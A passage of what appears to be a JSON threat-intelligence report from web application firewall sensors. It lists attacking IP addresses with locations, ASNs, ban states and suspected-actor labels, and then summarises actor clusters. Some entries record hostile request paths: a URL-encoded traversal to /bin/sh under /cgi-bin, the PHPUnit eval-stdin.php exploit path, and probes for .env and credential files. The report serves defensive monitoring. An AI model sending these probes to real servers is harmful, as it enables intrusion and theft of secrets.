    "2026-10-06",
    "2026-10-07"
   ]
  },
  {
   "ip": "82.102.18.116",
   "country": "France",
   "cc": "FR",
   "city": "Saint-Denis",
   "lat": 48.9316,
   "lon": 2.35633,
   "asn": 9009,
   "org": "M247 Europe SRL",
   "ptr": null,
   "types": [
    "cms-probe"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-05T19:50:00+02:00",
   "last_seen": "2026-10-05T19:50:00+02:00",
   "sensors": [
    "web-3"
   ],
   "notes": [],
   "tags": [
    "hosting-provider",
    "cluster:82.102.18.0/24"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected CMS exploitation bot",
    "confidence": "medium",
    "evidence": [
     "CMS, admin panel or PHP script probing",
     "2 addresses from 82.102.18.0/24 (AS9009) attacked the same night"
    ]
   },
   "seen_nights": [
    "2026-10-06"
   ]
  },
  {
   "ip": "84.247.157.60",
   "country": "France",
   "cc": "FR",
   "city": "Marseille",
   "lat": 43.2965,
   "lon": 5.36978,
   "asn": 141995,
   "org": "Contabo Asia Private Limited",
   "ptr": "vmi3615800.contaboserver.net",
   "types": [
    "rce-payload"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-05T18:33:00+02:00",
   "last_seen": "2026-10-05T18:33:00+02:00",
   "sensors": [
    "web-3"
   ],
   "notes": [],
   "tags": [
    "hosting-provider"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected exploit/RCE bot",
    "confidence": "low",
    "evidence": [
     "sent a shell or PHP payload"
    ]
   },
   "seen_nights": [
    "2026-10-06"
   ]
  },
  {
   "ip": "87.126.145.190",
   "country": "Bulgaria",
   "cc": "BG",
   "city": "Sofia",
   "lat": 42.6977,
   "lon": 23.3219,
   "asn": 8866,
   "org": "Vivacom Bulgaria EAD",
   "ptr": "87-126-145-190.ip.btc-net.bg",
   "types": [
    "rce-payload"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-05T18:06:00+02:00",
   "last_seen": "2026-10-05T18:06:00+02:00",
   "sensors": [
    "web-3"
   ],
   "notes": [],
   "tags": [],
   "paths": [
    "/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh"
   ],
   "actor": {
    "label": "Suspected Mirai-style IoT botnet",
    "confidence": "medium",
    "evidence": [
     "IoT/router exploit path with a downloader typical of Mirai-family loaders"
    ]
   },
   "seen_nights": [
    "2026-10-06"
   ]
  },
  {
   "ip": "89.126.211.166",
   "country": "Uzbekistan",
   "cc": "UZ",
   "city": "Tashkent",
   "lat": 41.2995,
   "lon": 69.2401,
   "asn": 202660,
   "org": "\"Uzbektelekom\" Joint Stock Company",
   "ptr": null,
   "types": [
    "rce-payload"
   ],
   "bans": 1,
   "max_offence": 3,
   "ban_state": "active",
   "requests_known": null,
   "first_seen": "2026-10-06T00:59:00+02:00",
   "last_seen": "2026-10-06T00:59:00+02:00",
   "sensors": [
    "web-3"
   ],
   "notes": [],
   "tags": [
    "repeat-offender",
    "multi-night"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected exploit/RCE bot",
    "confidence": "low",
    "evidence": [
     "sent a shell or PHP payload"
    ]
   },
   "seen_nights": [
    "2026-10-05",
    "2026-10-06"
   ]
  },
  {
   "ip": "91.92.240.86",
   "country": "Germany",
   "cc": "DE",
   "city": "Frankfurt am Main (Bergen-Enkheim)",
   "lat": 50.1567,
   "lon": 8.76813,
   "asn": 202412,
   "org": "Omegatech LTD",
   "ptr": null,
   "types": [
    "secret-probe"
   ],
   "bans": 1,
   "max_offence": 4,
   "ban_state": "active",
   "requests_known": null,
   "first_seen": "2026-10-06T01:57:00+02:00",
   "last_seen": "2026-10-06T01:57:00+02:00",
   "sensors": [
    "edge"
   ],
   "notes": [],
   "tags": [
    "spamhaus-drop",
    "firehol-level1",
    "repeat-offender"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "medium",
    "evidence": [
     "listed on Spamhaus DROP",
     "listed on FireHOL level 1",
     "hunts for .env, VCS or credential files"
    ]
   },
   "seen_nights": [
    "2026-10-06"
   ]
  },
  {
   "ip": "91.92.41.115",
   "country": "Bulgaria",
   "cc": "BG",
   "city": "Sofia",
   "lat": 42.6977,
   "lon": 23.3219,
   "asn": 211443,
   "org": "SINO WORLDWIDE TRADING LIMITED",
   "ptr": null,
   "types": [
    "secret-probe",
    "rce-payload"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-05T22:06:00+02:00",
   "last_seen": "2026-10-05T22:06:00+02:00",
   "sensors": [
    "edge"
   ],
   "notes": [],
   "tags": [
    "multi-night"
   ],
   "paths": [
    "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"
   ],
   "actor": {
    "label": "Suspected Androxgh0st-style Laravel/PHPUnit exploitation",
    "confidence": "low",
    "evidence": [
     "probes PHPUnit eval-stdin.php (CVE-2017-9841), a technique documented in CISA AA24-016A",
     "no request bodies are logged, so the malware family cannot be confirmed"
    ]
   },
   "seen_nights": [
    "2026-10-06",
    "2026-10-07"
   ]
  },
  {
   "ip": "94.143.143.250",
   "country": "Spain",
   "cc": "ES",
   "city": "Madrid",
   "lat": 40.4167,
   "lon": -3.70329,
   "asn": 8560,
   "org": "IONOS SE",
   "ptr": "ip94-143-143-250.pbiaas.com",
   "types": [
    "secret-probe"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-05T19:30:00+02:00",
   "last_seen": "2026-10-05T19:30:00+02:00",
   "sensors": [
    "edge"
   ],
   "notes": [],
   "tags": [
    "hosting-provider"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "low",
    "evidence": [
     "hunts for .env, VCS or credential files"
    ]
   },
   "seen_nights": [
    "2026-10-06"
   ]
  },
  {
   "ip": "94.243.10.91",
   "country": "Russia",
   "cc": "RU",
   "city": "Ishim",
   "lat": 56.1125,
   "lon": 69.4872,
   "asn": 8359,
   "org": "MTS PJSC",
   "ptr": "subscriber-94-243-10-91.mts-chita.ru",
   "types": [
    "command-injection"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-06T03:30:00+02:00",
   "last_seen": "2026-10-06T03:30:00+02:00",
   "sensors": [
    "web-3"
   ],
   "notes": [],
   "tags": [],
   "paths": [],
   "actor": {
    "label": "Suspected exploit/RCE bot",
    "confidence": "low",
    "evidence": [
     "sent a shell or PHP payload"
    ]
   },
   "seen_nights": [
    "2026-10-06"
   ]
  },
  {
   "ip": "20.65.201.226",
   "country": "United States",
   "cc": "US",
   "city": "San Antonio",
   "lat": 29.4252,
   "lon": -98.4946,
   "asn": 8075,
   "org": "Microsoft Corporation",
   "ptr": null,
   "types": [
    "attack-tool"
   ],
   "bans": 0,
   "max_offence": 0,
   "ban_state": "not banned",
   "requests_known": null,
   "first_seen": "2026-10-05T21:29:00+02:00",
   "last_seen": "2026-10-05T21:29:00+02:00",
   "sensors": [
    "web-1"
   ],
   "notes": [],
   "tags": [
    "hosting-provider"
   ],
   "paths": [
    "/actuator/health"
   ],
   "actor": {
    "label": "Automated attack tool",
    "confidence": "low",
    "evidence": [
     "request carried a known attack-tool user agent"
    ]
   },
   "seen_nights": [
    "2026-10-06"
   ]
  },
  {
   "ip": "45.138.12.28",
   "country": "Hong Kong",
   "cc": "HK",
   "city": "Sheung Wan",
   "lat": 22.286,
   "lon": 114.152,
   "asn": 218785,
   "org": "TC DATACENTER LIMITED",
   "ptr": null,
   "types": [
    "secret-probe",
    "credential-probe",
    "behaviour"
   ],
   "bans": 0,
   "max_offence": 0,
   "ban_state": "not banned",
   "requests_known": null,
   "first_seen": "2026-10-05T18:02:00+02:00",
   "last_seen": "2026-10-05T18:02:00+02:00",
   "sensors": [
    "edge"
   ],
   "notes": [],
   "tags": [
    "abuse-prone-hosting",
    "cluster:45.138.12.0/24",
    "multi-night"
   ],
   "paths": [
    "/admin/.env",
    "/config.env",
    "/credentials.json"
   ],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "medium",
    "evidence": [
     "AS218785 TC DATACENTER (abuse-prone hosting)",
     "hunts for .env, VCS or credential files",
     "6 addresses from 45.138.12.0/24 (AS218785) attacked the same night"
    ]
   },
   "seen_nights": [
    "2026-10-05",
    "2026-10-06"
   ]
  }
 ],
 "iocs": [],
 "actors": [
  {
   "label": "Suspected credential/secret-harvesting campaign",
   "confidence": "medium",
   "addresses": 36,
   "ips": [
    "87.121.84.174",
    "45.138.12.27",
    "54.94.85.181",
    "193.32.204.199",
    "34.237.176.214",
    "45.148.10.171",
    "80.94.92.65",
    "104.244.74.39",
    "193.32.126.155",
    "45.138.12.21",
    "45.148.10.120",
    "102.220.163.155",
    "111.90.180.172",
    "129.213.151.234",
    "130.12.180.117",
    "136.107.20.139",
    "160.176.79.216",
    "193.32.162.157",
    "212.231.226.20",
    "23.180.120.153",
    "34.156.206.32",
    "34.79.12.228",
    "34.81.90.137",
    "34.85.106.58",
    "35.189.229.134",
    "35.215.59.170",
    "35.217.150.248",
    "35.240.194.248",
    "45.138.12.10",
    "45.138.12.51",
    "45.138.12.6",
    "45.153.102.164",
    "45.156.87.131",
    "91.92.240.86",
    "94.143.143.250",
    "45.138.12.28"
   ],
   "top_countries": {
    "HK": 6,
    "NL": 5,
    "US": 3,
    "BE": 3,
    "AD": 2
   },
   "types": {
    "secret-probe": 29,
    "credential-probe": 10,
    "php-probe": 1,
    "cms-probe": 1,
    "behaviour": 1
   },
   "evidence": [
    "hunts for .env, VCS or credential files",
    "listed on Spamhaus DROP",
    "listed on FireHOL level 1",
    "AS218785 TC DATACENTER (abuse-prone hosting)",
    "6 addresses from 45.138.12.0/24 (AS218785) attacked the same night",
    "AS48090 TECHOFF SRV (abuse-prone hosting)"
   ]
  },
  {
   "label": "Suspected exploit/RCE bot",
   "confidence": "medium",
   "addresses": 28,
   "ips": [
    "49.0.202.115",
    "223.123.92.102",
    "165.154.218.226",
    "103.146.23.23",
    "103.216.170.129",
    "103.46.186.148",
    "104.234.186.154",
    "120.48.22.219",
    "13.89.126.19",
    "165.99.207.153",
    "186.182.105.49",
    "20.163.10.217",
    "20.64.98.9",
    "20.65.145.206",
    "20.65.178.72",
    "20.80.111.73",
    "221.159.119.6",
    "4.148.17.77",
    "40.124.168.91",
    "40.124.186.173",
    "45.141.26.3",
    "45.195.231.146",
    "45.43.60.98",
    "52.165.83.218",
    "73.53.43.220",
    "84.247.157.60",
    "89.126.211.166",
    "94.243.10.91"
   ],
   "top_countries": {
    "US": 12,
    "PK": 2,
    "SG": 1,
    "VN": 1,
    "IN": 1
   },
   "types": {
    "rce-payload": 26,
    "command-injection": 2
   },
   "evidence": [
    "sent a shell or PHP payload",
    "2 addresses from 40.124.186.0/24 (AS8075) attacked the same night"
   ]
  },
  {
   "label": "Internet research scanner (benign)",
   "confidence": "high",
   "addresses": 24,
   "ips": [
    "138.68.86.32",
    "68.69.177.112",
    "128.199.182.55",
    "139.59.136.184",
    "142.93.129.190",
    "143.244.168.161",
    "147.182.149.75",
    "157.245.204.205",
    "159.223.132.86",
    "159.89.12.166",
    "164.92.107.174",
    "165.227.84.14",
    "167.99.181.249",
    "20.84.75.121",
    "206.189.95.232",
    "206.81.12.187",
    "206.81.24.227",
    "207.154.197.113",
    "209.38.248.17",
    "40.124.172.22",
    "64.225.75.246",
    "64.226.65.160",
    "64.227.32.66",
    "65.49.1.94"
   ],
   "top_countries": {
    "US": 9,
    "DE": 7,
    "SG": 3,
    "NL": 2,
    "CA": 2
   },
   "types": {
    "secret-probe": 21,
    "rce-payload": 2,
    "php-probe": 1
   },
   "evidence": [
    "reverse DNS b69efeaf93.scan.leakix.org",
    "reverse DNS d5f757a6.scanners.onlyscans.net",
    "reverse DNS ea73d34464.scan.leakix.org",
    "reverse DNS c3ee778768.scan.leakix.org",
    "reverse DNS f20a02ce01.scan.leakix.org",
    "reverse DNS b4ed9564d2.scan.leakix.org"
   ]
  },
  {
   "label": "Suspected CMS exploitation bot",
   "confidence": "medium",
   "addresses": 7,
   "ips": [
    "20.214.109.68",
    "82.102.18.180",
    "20.194.30.107",
    "20.194.96.114",
    "20.219.14.152",
    "40.86.204.64",
    "82.102.18.116"
   ],
   "top_countries": {
    "KR": 3,
    "FR": 2,
    "IN": 1,
    "CA": 1
   },
   "types": {
    "cms-probe": 4,
    "php-probe": 3
   },
   "evidence": [
    "CMS, admin panel or PHP script probing",
    "2 addresses from 82.102.18.0/24 (AS9009) attacked the same night"
   ]
  },
  {
   "label": "Automated attack tool",
   "confidence": "medium",
   "addresses": 6,
   "ips": [
    "66.240.223.214",
    "66.240.223.240",
    "187.108.1.142",
    "20.14.88.130",
    "40.124.186.184",
    "20.65.201.226"
   ],
   "top_countries": {
    "US": 5,
    "BR": 1
   },
   "types": {
    "attack-tool": 6
   },
   "evidence": [
    "request carried a known attack-tool user agent",
    "2 addresses from 66.240.223.0/24 (AS10439) attacked the same night",
    "2 addresses from 40.124.186.0/24 (AS8075) attacked the same night"
   ]
  },
  {
   "label": "Unattributed automated probe",
   "confidence": "low",
   "addresses": 5,
   "ips": [
    "20.219.185.206",
    "35.241.178.74",
    "206.189.39.32",
    "74.161.160.33",
    "134.33.66.210"
   ],
   "top_countries": {
    "IN": 1,
    "BE": 1,
    "SG": 1,
    "CH": 1,
    "US": 1
   },
   "types": {},
   "evidence": []
  },
  {
   "label": "Known-bad scanning infrastructure",
   "confidence": "medium",
   "addresses": 3,
   "ips": [
    "64.94.84.84",
    "176.65.148.150",
    "176.65.149.188"
   ],
   "top_countries": {
    "NL": 2,
    "US": 1
   },
   "types": {
    "rce-payload": 1,
    "attack-tool": 1
   },
   "evidence": [
    "listed on Spamhaus DROP",
    "listed on FireHOL level 1",
    "AS51396 Pfcloud (abuse-prone hosting)",
    "AS399629 BL Networks (abuse-prone hosting)"
   ]
  },
  {
   "label": "Suspected Mirai-style IoT botnet",
   "confidence": "medium",
   "addresses": 2,
   "ips": [
    "120.48.171.196",
    "87.126.145.190"
   ],
   "top_countries": {
    "CN": 1,
    "BG": 1
   },
   "types": {
    "rce-payload": 2
   },
   "evidence": [
    "IoT/router exploit path with a downloader typical of Mirai-family loaders"
   ]
  },
  {
   "label": "Suspected Androxgh0st-style Laravel/PHPUnit exploitation",
   "confidence": "low",
   "addresses": 1,
   "ips": [
    "91.92.41.115"
   ],
   "top_countries": {
    "BG": 1
   },
   "types": {
    "secret-probe": 1,
    "rce-payload": 1
   },
   "evidence": [
    "probes PHPUnit eval-stdin.php (CVE-2017-9841), a technique documented in CISA AA24-016A",
    "no request bodies are logged, so the malware family cannot be confirmed"
   ]
  }
 ],
 "banned_identifiers": {
  "ip_addresses": 103,
  "ban_actions": 122,
  "email_addresses": 0,
  "other": 0,
  "note": "The WAF bans network addresses only; no e-mail or account identifiers appear in the source."
 }
}